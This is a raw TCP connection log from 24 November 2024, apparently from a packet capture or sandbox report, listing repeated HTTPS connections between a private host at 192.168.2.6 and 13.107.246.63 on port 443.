                                                                                                                                                                                              Nov 24, 2024 13:40:14.186124086 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.186130047 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.330051899 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.340193033 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.350929022 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.350950956 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.351708889 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.351715088 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.352652073 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.352677107 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.359812975 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.359819889 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.615716934 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618617058 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618686914 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618736982 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618756056 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618767023 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.618772984 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.623307943 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.623430014 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.623509884 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.623653889 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.623687029 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.765769005 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.771955967 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.771992922 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.772682905 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.772701025 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.775949001 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779155970 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779340982 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779608965 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779623985 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779635906 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.779640913 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.782694101 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.782728910 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.782808065 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.782974958 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.782987118 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.786206007 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.789146900 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.791980028 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.792016983 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.792035103 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.792043924 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.792052031 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.794327974 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.794344902 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.794413090 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.794523001 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.794534922 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.838198900 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.838691950 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.838712931 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.839158058 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.839162111 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.199351072 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.203041077 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.203098059 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.203108072 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.203145981 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.204832077 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.204852104 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.204864979 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.204869986 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.209338903 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.209382057 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.209459066 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.209595919 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.209611893 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.294492960 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.297564030 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.300033092 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.300084114 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.300105095 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.300138950 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.300146103 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.303287029 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.303333998 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:15.304269075 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.304418087 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:15.304430962 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.470805883 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.473969936 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.474042892 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.474447012 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.474462032 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.574472904 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.575083971 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.575114965 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.575609922 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.575617075 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.626105070 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.626704931 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.626728058 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.627223969 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.627229929 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.944895983 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.947782040 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.947909117 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.947946072 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.948019028 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.995528936 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.995528936 CET49923443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:16.995574951 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:16.995604038 CET4434992313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.006531954 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.006613970 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.006688118 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.010042906 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.010062933 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024544001 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024633884 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024707079 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024951935 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024970055 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024981976 CET49925443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.024987936 CET4434992513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.028578043 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.028611898 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.028692961 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.028836966 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.028858900 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.056816101 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.057470083 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.057490110 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.058095932 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.058103085 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.079685926 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.080195904 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.080223083 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.080713987 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.080718994 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084023952 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084076881 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084130049 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084413052 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084424019 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084434032 CET49924443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.084439039 CET4434992413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.087416887 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.087455034 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.087527037 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.087749958 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.087766886 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.493170023 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496148109 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496196032 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496201992 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496244907 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496376038 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496395111 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496412039 CET49927443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.496417046 CET4434992713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.501359940 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.501405954 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.501492023 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.501648903 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.501661062 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.539880037 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.542947054 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.543008089 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.543071985 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.543087006 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.543095112 CET49926443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.543103933 CET4434992613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.546207905 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.546252966 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:17.546309948 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.546489000 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:17.546504974 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.823856115 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824208021 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824469090 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824480057 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824558020 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824569941 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824987888 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.824994087 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.825088024 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.825093031 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.876442909 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.886205912 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.886219025 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.886620045 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:18.886625051 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.267034054 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.270478010 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.270608902 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.271173000 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.274383068 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.274450064 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.274456024 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.274525881 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.296031952 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.296031952 CET49928443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.296056986 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.296066999 CET4434992813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.297189951 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.297189951 CET49929443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.297214985 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.297224045 CET4434992913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.300015926 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.300049067 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.300198078 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.319875956 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.323019028 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.323113918 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.348258972 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.367121935 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.369544983 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.369595051 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.369678974 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.379048109 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.379082918 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.379774094 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.379795074 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.380522013 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.380527020 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.380629063 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.380646944 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.381445885 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.381464005 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.381474972 CET49930443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.381479979 CET4434993013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.383595943 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.383627892 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.383964062 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.383970022 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.386574984 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.386596918 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.386665106 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.386766911 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.386775970 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.791481018 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.794651985 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.794743061 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.794881105 CET49932443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.794907093 CET4434993213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.798779011 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.798834085 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.798979044 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.799211979 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.799227953 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.821177959 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.826994896 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.827066898 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.848196030 CET49931443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.848225117 CET4434993113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.858494043 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.858537912 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:19.858614922 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.858937979 CET49937443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:19.858951092 CET4434993713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.169559002 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.170532942 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.170555115 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.171036959 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.171042919 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.180458069 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.182518005 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.182529926 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.183520079 CET49933443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.183525085 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.225646019 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.226510048 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.226547956 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.226881981 CET49934443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.226888895 CET4434993413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.585884094 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.586539984 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.586571932 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.586987019 CET49936443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.586996078 CET4434993613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.614392996 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.617657900 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.620193958 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.620384932 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.620409012 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.620420933 CET49935443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.620425940 CET4434993513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.623579979 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.623624086 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.623856068 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.623856068 CET49938443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:21.623888969 CET4434993813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.624066114 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.627028942 CET4434993313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:21.628844976 CET49933443192.168.2.613.107.246.63
